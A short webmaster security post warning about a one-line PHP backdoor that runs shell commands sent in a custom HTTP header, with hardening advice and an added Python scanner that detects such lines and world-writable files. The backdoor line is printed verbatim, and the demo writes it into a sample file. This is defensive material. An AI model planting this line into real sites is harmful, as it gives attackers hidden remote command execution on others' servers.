Are you a webmaster who is concerned about hackers infesting your sites? Well, be on the lookout for crud like this:
<? passthru(getenv("HTTP_ACCEPT_jayman")); ?>
This script runs whatever command is sent to it in an “Accept-jayman:” HTTP header. “jayman” is just an example (a prevalent one); it could be anything. The line can be placed in any of your PHP scripts without affecting your users’ experience, because the header is not something sent by any browser. Headers are also not typically logged anywhere, so the attacker may not be caught by inspecting logs.
I’ve seen this come up quite often, and it actually seems to be getting worse. Most of the time the attackers just want a place to run an IRC bot (iroffer), but often they want to redirect your surfers to their affiliate program links, send spam, or use your site to host their spam advertised content.
If you see something like this in your scripts, or on its own, it was put there by an attacker using another exploitable script on your site. It’s very important to keep your site’s scripts up-to-date, and it’s a good idea to hire someone to audit your code or keep it up to date, if you’re not a programmer yourself. (Be aware that whoever you hire may not actually be able to debug all of your scripts, if any of them use Zend Encoder created files.)
It’s also important to make sure your permissions are not overly open. PHP scripts, typically, run as the web server’s user. If your directory permissions are open (777, for example), and you have an exploitable script, someone could easily create their own files in the directory, and even replace your files with their own copies.
Ultimately, the best advice I can give is to check your site’s contents often, keep your software up to date, keep your permissions sane, and hire someone knowledgeable and trustworthy to check out your site if you find you need help.
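One way to automate the "check your site's contents often" advice, as an added example that is not part of the original post: a small Python scanner that flags PHP lines where a command-execution call reads directly from an HTTP header, plus any world-writable files or directories. The function names, the extension list and the sample web root are assumptions made for illustration, and the pattern only catches the direct one-line form shown above, not obfuscated variants.

```python
import os
import re
import stat
import tempfile

# An exec-style PHP call whose argument is read straight from a request header.
EXEC_FUNCS = r"(?:passthru|system|exec|shell_exec|popen|proc_open|eval)"
HEADER_SRC = r"(?:getenv\s*\(\s*['\"]HTTP_[^'\"]+['\"]\s*\)|\$_SERVER\s*\[\s*['\"]HTTP_[^'\"]+['\"]\s*\])"
BACKDOOR_RE = re.compile(EXEC_FUNCS + r"\s*\(\s*" + HEADER_SRC, re.IGNORECASE)


def scan_webroot(root):
    """Return (suspicious, world_writable) findings under root (hypothetical helper)."""
    suspicious, world_writable = [], []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            mode = os.lstat(path).st_mode
            # Skip symlinks; flag anything writable by "other" (777, 666, ...).
            if not stat.S_ISLNK(mode) and mode & stat.S_IWOTH:
                world_writable.append(path)
        for name in filenames:
            if not name.lower().endswith((".php", ".phtml", ".inc")):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if BACKDOOR_RE.search(line):
                        suspicious.append((path, lineno, line.strip()))
    return suspicious, world_writable


def demo():
    """Build a constructed sample web root in a temp directory and scan it."""
    root = tempfile.mkdtemp()
    # Constructed sample: the one-liner from the post appended to a normal script.
    with open(os.path.join(root, "gallery.php"), "w") as fh:
        fh.write("<?php echo 'gallery'; ?>\n"
                 "<? passthru(getenv(\"HTTP_ACCEPT_jayman\")); ?>\n")
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    os.chmod(uploads, 0o777)  # the overly open permission the post warns about
    return scan_webroot(root)


if __name__ == "__main__":
    hits, writable = demo()
    print("suspicious:", hits)
    print("world-writable:", writable)
```

Point `scan_webroot` at your real document root and run it on a schedule; any hit deserves a manual look at the file and at how it got there.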

